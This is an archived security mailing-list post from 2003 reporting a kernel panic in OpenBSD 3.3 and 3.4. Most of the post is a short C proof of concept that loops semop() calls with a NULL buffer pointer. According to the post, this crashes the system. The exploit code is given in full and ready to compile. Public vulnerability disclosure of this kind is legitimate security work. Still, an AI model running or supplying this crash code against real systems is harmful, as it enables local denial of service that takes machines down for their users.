lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.GSO.4.44.0311211728490.22709-100000@sodom.uberhax0r.net> From: noir at uberhax0r.net (noir@...rhax0r.net) Subject: yet another panic() in OpenBSD a project lacking the basic QA and unit testing and here is the outcome: #include <stdio.h> #include <sys/types.h> #include <sys/sem.h> #include <sys/ipc.h> int main() { int i; for(i = 0; i < 0x40; i++) semop(i, (struct sembuf *) NULL, 0); } PANIC in OpenBSD 3.3 and 3.4 is confirmed.